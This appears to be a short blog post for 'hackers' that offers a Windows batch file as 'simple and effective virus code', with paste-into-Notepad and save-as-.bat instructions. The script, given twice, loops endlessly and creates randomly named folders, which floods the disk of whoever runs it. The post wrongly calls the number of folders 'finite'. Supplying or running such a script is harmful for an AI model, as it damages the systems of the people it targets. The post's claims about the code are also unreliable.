Hi Hackers, this batch code will very helpful for you. This is simple and effective virus code.
As usual open notepad.
Copy this code to Notepad.
@echo off
:top
md %random%
goto top
Save the file with .bat extension (for eg: folderscreate.bat)
That's all if you double click the file it will create a finite folder wherever the batch file is.
As usual open notepad.
Copy this code to Notepad.
@echo off
:top
md %random%
goto top
That's all if you double click the file it will create a finite folder wherever the batch file is.
0 comments:
Post a Comment